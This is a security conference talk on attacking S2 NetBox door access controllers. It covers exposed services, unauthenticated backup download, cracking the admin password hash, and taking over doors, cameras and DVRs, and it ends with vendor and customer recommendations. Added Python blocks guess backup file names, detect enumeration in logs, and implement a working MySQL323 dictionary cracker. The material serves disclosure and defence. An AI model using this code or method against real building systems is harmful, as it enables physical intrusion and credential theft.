“We don’t need no stinkin’ badges!”
Hacking electronic door access controllers
Shawn Merdinger, security researcher / corporate agitator
CarolinaCon 2010

The obligatory speaker slide

Outline
- EDAC technology: trends, landscape, vendors, architecture
- EDAC real-world analysis: S2 Security NetBox
  - Research, exposure, vulnerabilities, attacks
- Countermeasures and recommendations

Learning outcomes
- Awareness of security issues in EDAC systems
- Major players, vendors, resellers
- Pen-testing knowledge
- Research and testing methods

Choice quotations
“When hackers put viruses on your home computer it's a nuisance; when they unlock doors at your facility it's a nightmare.”
  John L. Moss, S2 Security CEO, STAD, Volume 14, Issue 1, 1 January 2004

Q. About security of buildings around town… what was your response?
ATTY GEN. RENO: “Let's do something about it.”
Q. Is this a good thing that has happened?
ATTY GEN. RENO: I think any time you expose vulnerabilities, it's a good thing.
  Department of Justice Weekly Media Briefing, 25 May 2000

EDAC Technology Overview
- Trend is towards IP, away from proprietary solutions
- Convergence of IP and video
- Adding other building systems (HVAC, elevators, alarms)
- Cost savings, integration, increased capabilities
- Most controllers use embedded Linux
- Wide range of vendors in the EDAC space: S2 Security, Honeywell, HID Global (VertX), Ingersoll-Rand, Bosch Security, Reach Systems, Cisco Systems (Richards-Zeta), Brivo, DSX Access, RS2 Technologies, Synergistics

EDAC Deployment
Often you’ll see:
- Managed by building facilities people
- Stuck in a closet and forgotten
- Long lifecycles of 5-10 years
- Distanced from IT security
  - “Physical security is not your domain. It’s ours.”
  - Patching, upgrades, maintenance? What? Huh?
  - Policies regarding passwords and logging don’t apply
- Third-party local service contractor adds doors and does the hardware configuration
EDAC Architecture

S2 Security NetBox
- Built by S2 Security
- 7000+ systems installed worldwide
- Schools, hospitals, businesses, LEA facilities, etc.
- Same box is sold under multiple brand names
  - Built by S2 Security: NetBox
  - Distributed by Linear: eMerge 50 & 5000
  - Resellers’ re-branding: Sonitrol eAccess

S2 Security: Reading up
- Preparation and information gathering
  - S2 Security case studies, press releases
  - “The Google”
  - Lexis-Nexis Academic Universe, ABI-Inform, etc.
- Example: from http://tinyurl.com/s2mysql alone it was possible to determine
  - Samba client
  - MySQL, MyISAM
  - Lineo Linux distribution (just like the Zaurus!)
  - Processor is an ARM-core Intel IXP425 at 533 MHz
  - Only 15 months from design to first customer shipment
  - “S2 did not have much prior experience with open source”
  - “MySQL is used to store everything from reports, user information, customized features, facility diagrams, and more”

S2 Security Marketing

NetBox Components
- HTTP
- MySQL / Postgres
- NmComm
- FTP/Telnet
- Features!
NetBox Component: HTTP Server
- GoAhead WebServer on TCP/80
- Poor choice: sixteen CVEs, e.g. CVE-2003-1568, CVE-2002-2431, CVE-2002-2430, CVE-2002-2429, CVE-2002-2428
- No vendor response; the typical example is CVE-2002-1951, where the reporter notes that GoAhead was “contacted on three different occasions during the last three months but supplied no meaningful response”
- “Data security is a challenge, and unfortunately, not everyone has risen to it.” John L. Moss, S2 Security CEO

NetBox Component: MySQL
- MySQL server listening on TCP/3306
- Outdated database: version 2.X uses MySQL 4.0; 3.X uses Postgres
- Just how old is MySQL 4.0? WTF? End of download? (4.0 went GA in 2003 and had reached end of life by 2008, well before this talk.)

NetBox Component: NmComm
- Service listening on TCP/7362
- Performs multicast discovery of nodes
- Daemon coded by S2 Security
- Patent issued 15 December 2009: “System and method to configure a network node”, http://tinyurl.com/s2patent
- A home-grown protocol on an open port: “Gentlemen, start your fuzzers!”

NetBox Component: FTP & Telnet
- Cleartext protocols on a security device
  - Telnet to manage
  - FTP for DB backups
- Poor security-oriented documentation
- “We see some vendors fitting their serial devices with Telnet adapters, which simply sit on the network transmitting unsecured serial data.” John L. Moss, S2 Security CEO

NetBox Components: Features!
- Lots of extras and license options: elevators, HVAC, burglar alarm, VoIP
- Increases complexity and expands the attack surface: more daemons, more libraries
- View floorplans
NetBox: Unauthenticated Reset
- VU#571629 (public 2010-01-04)
- Unauthenticated remote reset of the controller
NetBox: Unauthenticated Access to Backup
- VU#228737 (not public)
- Unauthenticated attacker can download DB backups
- Nightly DB backup is a hard-coded cron job
- File name is “full_YYYYMMDD_HHMMSS.1.dar”: a predictable naming convention with a timestamp
- Extract the .dar archive (dar is the Disk ARchive format)
- Backup DB is in “var/db/s2/tmp/backup/all.dmp”
- Attacker gets the backup DB = game over: the entire system's data is in the DB!
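The two properties the slide relies on, a fixed nightly cron job and a timestamped file name, are what make the backup guessable. The following Python is an added example, not code from the talk or from S2: it shows how small the guess space actually is once the cron minute is known, and what an enumeration run looks like in an access log so a defender can alert on it. The log line format, the /backup/ path and the host addresses are assumptions made for the demo.

```python
import re
from datetime import datetime, timedelta

# Only two facts come from the slides: the backup is written by a fixed nightly
# cron job and is named full_YYYYMMDD_HHMMSS.1.dar. The log format, the /backup/
# path and every address below are constructed for this demo.
BACKUP_RE = re.compile(r"full_(\d{8})_(\d{6})\.1\.dar")

# Hypothetical simplified access-log line: "<date> <time> <client> <verb> <path> <status>"
LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (GET|RETR) (\S+) (\d{3})$")
SUCCESS = {"200", "226"}  # HTTP OK, FTP "transfer complete"


def candidate_names(day: str, hour: int, minute: int):
    """Backup names possible for one day (YYYYMMDD) when the cron time is known to the minute.

    cron starts the job at HH:MM:00 and only the seconds field in the name is
    uncertain, so the space is 60 guesses per day, not the 86,400 HHMMSS suggests.
    """
    base = f"full_{day}_{hour:02d}{minute:02d}"
    return [f"{base}{sec:02d}.1.dar" for sec in range(60)]


def candidate_names_between(start_day: str, days: int, hour: int, minute: int):
    """Same, for a run of consecutive days starting at start_day (YYYYMMDD)."""
    first = datetime.strptime(start_day, "%Y%m%d")
    names = []
    for i in range(days):
        day = (first + timedelta(days=i)).strftime("%Y%m%d")
        names.extend(candidate_names(day, hour, minute))
    return names


def flag_backup_fetches(log_lines, allowed_clients, guess_threshold=3):
    """Two detections over access-log lines:
    - unauthorised: a successful fetch of a backup archive by a client outside the allow-list
    - enumerating: any client that asked for backup names at least guess_threshold times,
      which is what walking the seconds field looks like (a run of 404s, then one 200)
    """
    unauthorised = []
    per_client = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, verb, path, status = m.groups()
        name = path.rsplit("/", 1)[-1]
        if not BACKUP_RE.fullmatch(name):
            continue
        per_client[client] = per_client.get(client, 0) + 1
        if status in SUCCESS and client not in allowed_clients:
            unauthorised.append((ts, client, verb, name))
    enumerating = sorted(c for c, n in per_client.items() if n >= guess_threshold)
    return {"unauthorised": unauthorised, "enumerating": enumerating}


SAMPLE_LOG = [  # constructed: 10.0.0.5 is the legitimate backup host, 203.0.113.7 an attacker
    "2010-01-05 02:00:14 10.0.0.5 RETR /backup/full_20100105_020003.1.dar 226",
    "2010-01-05 09:12:01 203.0.113.7 GET /backup/full_20100105_020000.1.dar 404",
    "2010-01-05 09:12:01 203.0.113.7 GET /backup/full_20100105_020001.1.dar 404",
    "2010-01-05 09:12:02 203.0.113.7 GET /backup/full_20100105_020002.1.dar 404",
    "2010-01-05 09:12:02 203.0.113.7 GET /backup/full_20100105_020003.1.dar 200",
    "2010-01-05 09:13:40 203.0.113.7 GET /index.html 200",
]

if __name__ == "__main__":
    print(len(candidate_names_between("20100101", 7, 2, 0)), "names cover a whole week")
    for key, value in flag_backup_fetches(SAMPLE_LOG, {"10.0.0.5"}).items():
        print(key, value)
```

The enumeration detector is the more useful of the two in practice: a legitimate backup client fetches one archive per night, so several requests for `.dar` names from one client in a short window is a strong signal even before any of them succeeds.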
NetBox: Unauthenticated Access to Backup (continued)
- Extraction of the administrator's MySQL 64-bit hash (the 16-hex-digit pre-4.1 MySQL password hash format)
- Affects NetBox 2.X (MySQL) and 3.X (Postgres)
- Hash is trivial to crack: unsalted and very fast to compute
- Attacker now has admin access
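An added example, not from the slides or from S2, of why the recovered hash is trivial to crack. It assumes that the slide's “MySQL 64-bit hash” is the 16-hex-digit pre-4.1 MySQL password scrambler (OLD_PASSWORD(), listed as MySQL323 in John the Ripper and hashcat), reimplements that published algorithm, and runs a small dictionary attack against it. The word list and the passwords it recovers are constructed for the demo, not real credentials.

```python
# Pre-4.1 MySQL password scrambler, reimplemented from the published algorithm
# (sql/password.c, hash_password()). Assumption: this is the format the slide
# calls "MySQL 64-bit hash". Word list and passwords below are constructed.

MASK32 = 0xFFFFFFFF


def mysql323_hash(password: str) -> str:
    """Return the 16-hex-digit hash: two 31-bit state words, no salt, no work factor.

    Equal passwords give equal hashes, and a single CPU core can try millions of
    guesses per second, which is what "trivial to crack" means here.
    """
    nr, nr2, add = 1345345333, 0x12345671, 7
    for c in password.encode("utf-8"):
        if c in (0x20, 0x09):  # the original skips spaces and tabs
            continue
        nr ^= ((((nr & 63) + add) * c) + (nr << 8)) & MASK32
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & MASK32
        add += c
    return f"{nr & 0x7FFFFFFF:08x}{nr2 & 0x7FFFFFFF:08x}"


def mangle(word: str):
    """Cheap rules: case variants combined with common suffixes."""
    for base in (word, word.capitalize(), word.upper()):
        for suffix in ("", "1", "123", "2010", "!"):
            yield base + suffix


def crack(target_hash: str, wordlist, use_rules: bool = True):
    """Dictionary attack; returns the recovered password or None."""
    target = target_hash.lower()
    for word in wordlist:
        for cand in (mangle(word) if use_rules else (word,)):
            if mysql323_hash(cand) == target:
                return cand
    return None


def build_table(wordlist):
    """Because there is no salt, a precomputed hash -> password table works directly."""
    return {mysql323_hash(c): c for w in wordlist for c in mangle(w)}


def table_lookup(target_hash: str, table: dict):
    return table.get(target_hash.lower())


WORDS = ["admin", "password", "netbox", "s2", "security", "letmein"]  # constructed list

if __name__ == "__main__":
    h = mysql323_hash("netbox2010")
    print(h, "->", crack(h, WORDS))
    print(table_lookup(mysql323_hash("Password!"), build_table(WORDS)))
```

In a real engagement the extracted hash would simply be fed to hashcat (`-m 200`) or John the Ripper with a large word list; the point of the hand-rolled version is to make visible that there is nothing in the scheme, no salt and no iteration count, that slows the attacker down.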
NetBox Pwnage: Doors
- Open any door, right now or on a schedule

NetBox Pwnage: Cameras
- Backup file contains IP camera information: name, IP address, admin username and password
- NetBox 2.X and 3.X systems vulnerable
- Attacker now owns the IP cameras
- “Most hackers don't care about watching your lobby. If they gain access to the network, they're going to go after financial data and trade secrets.” Justin Lott, Bosch Security marketing

NetBox Pwnage: DVRs
- Usernames and passwords for the DVRs are in the backup DB
- Poor setup guides for DVRs recommend keeping the default username and password (On-Net Surveillance Systems Network Video Recorder document)
NetBox Fingerprinting
- Remote identification
  - MAC OUI registered to S2 Security
  - Nmap service fingerprint submitted (nmap 5.20)

NetBox: the Shodan effect

Shodan effect: other EDACs
- iGuard biometric fingerprint reader

I am scared…
Recommendations: Vendor
- Conduct security evaluations on your products
- Provide secure deployment guides
- Tighten up third-party integration
- Improve logging: more detail (changes, auditing, debug levels), ability to send to a log server
- HTTP: use a “better” HTTP daemon, enable HTTPS by default, modify banners, reduce footprint, etc.
- FTP: change to SFTP
- Telnet: change to SSH

Recommendations: Customers
- Demand better security from vendor, reseller, and service contractor; expect fixes and patches
- Manage your EDAC like any other IT system: patching, change management, security reviews
- Technical: isolate eMerge system components (VLANs, MAC auth, VPN, restrict IP, etc.)
